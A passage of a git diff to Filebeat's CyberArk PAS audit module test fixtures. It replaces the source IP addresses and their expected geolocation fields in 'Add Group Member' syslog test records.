-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log b/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log
index bff61c277da8..6c111a700cd2 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log
@@ -1,14 +1,14 @@
-<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:38</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMAppUsers</SourceUser>\n    <TargetUser>PSMPApp_VAGRANT</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:38</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PVWAGWAccounts</SourceUser>\n    <TargetUser>PSMPGW_VAGRANT</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PVWAGWAccounts</SourceUser>\n    <TargetUser>PSMPGW_SSH</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMAppUsers</SourceUser>\n    <TargetUser>PSMPApp_SSH</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:21</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMP_ADB_AppUsers</SourceUser>\n    <TargetUser>PSMP_ADB_asr-cyberark-psm-ssh</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:38</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMAppUsers</SourceUser>\n    <TargetUser>PSMPApp_VAGRANT</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:38</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PVWAGWAccounts</SourceUser>\n    <TargetUser>PSMPGW_VAGRANT</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PVWAGWAccounts</SourceUser>\n    <TargetUser>PSMPGW_SSH</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMAppUsers</SourceUser>\n    <TargetUser>PSMPApp_SSH</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:21</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMP_ADB_AppUsers</SourceUser>\n    <TargetUser>PSMP_ADB_asr-cyberark-psm-ssh</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log-expected.json
index 131df5259cdb..0f88356cfac0 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/265_add_group_member.log-expected.json
@@ -9,7 +9,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMAppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "PSMPApp_localhost.localdomain",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:22",
         "event.action": "add group member",
@@ -29,19 +29,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
